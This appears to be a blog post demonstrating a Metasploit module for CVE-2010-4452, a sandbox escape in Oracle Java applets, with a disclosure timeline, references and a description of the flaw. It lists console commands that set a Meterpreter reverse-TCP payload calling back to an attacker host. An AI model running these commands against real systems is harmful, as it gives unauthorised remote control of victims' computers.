aka wow on ZATAZ.com
CVE-2010-4452 : Oracle Java Applet2ClassLoader Remote Code Execution Exploit
Timeline :
Vulnerability discovered by Frederic Hoguin
Vulnerability transmitted to ZDI by Frederic Hoguin
Vulnerability reported to the vendor by ZDI the 2010-09-28
Coordinated public release of advisory the 2011-02-15
Vulnerability details publicly released by Frederic Hoguin the 2011-03-11
Metasploit PoC provided the 2011-03-15
PoC provided by :
Frederic Hoguin
jduck
Reference(s) :
CVE-2010-4452
ZDI-11-084
OSVDB-71193
Oracle
Affected version(s) :
Oracle JRE 6 & JDK 6 Update 23 and before
Tested on Windows XP SP3 with :
Oracle JRE 6 Update 16
Description :
This module exploits a vulnerability in the Java Runtime Environment that allows an attacker to run an applet outside of the Java Sandbox. When an applet is invoked with: 1. A “codebase” parameter that points at a trusted directory 2. A “code” parameter that is a URL that does not contain any dots the applet will run outside of the sandbox.
Commands :
use exploit/windows/browser/java_codebase_trust
set SRVHOST 192.168.178.21
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploitsysinfo
getuid
I recommend you to read these related posts
- CVE-2008-5353 : Sun Java Calendar Deserialization Exploit
- CVE-2012-0500 Oracle Java Web Start Plugin Command Line Argument Injection Metasploit Demo
- CVE-2010-0840 : Java Statement.invoke Trusted Method Chain Exploit
- CVE-2010-0094 : Java RMIConnectionImpl Deserialization Privilege Escalation Exploit
- CVE-2010-3563 : Sun Java Web Start BasicServiceImpl Remote Code Execution Exploit
- CVE-2012-5088 Java Applet Method Handle RCE Metasploit Demo
- CVE-2012-1723 Oracle Java Applet Field Bytecode Verifier Cache RCE Metasploit Demo
- CVE-2013-2423 – Java 7u17 Applet Reflection Type Confusion RCE Metasploit Demo
- CVE-2011-3544 Java Applet Rhino Script Engine Metasploit Demo
- CVE-2012-5076 Java Applet JAX-WS Remote Code Execution Metasploit Demo
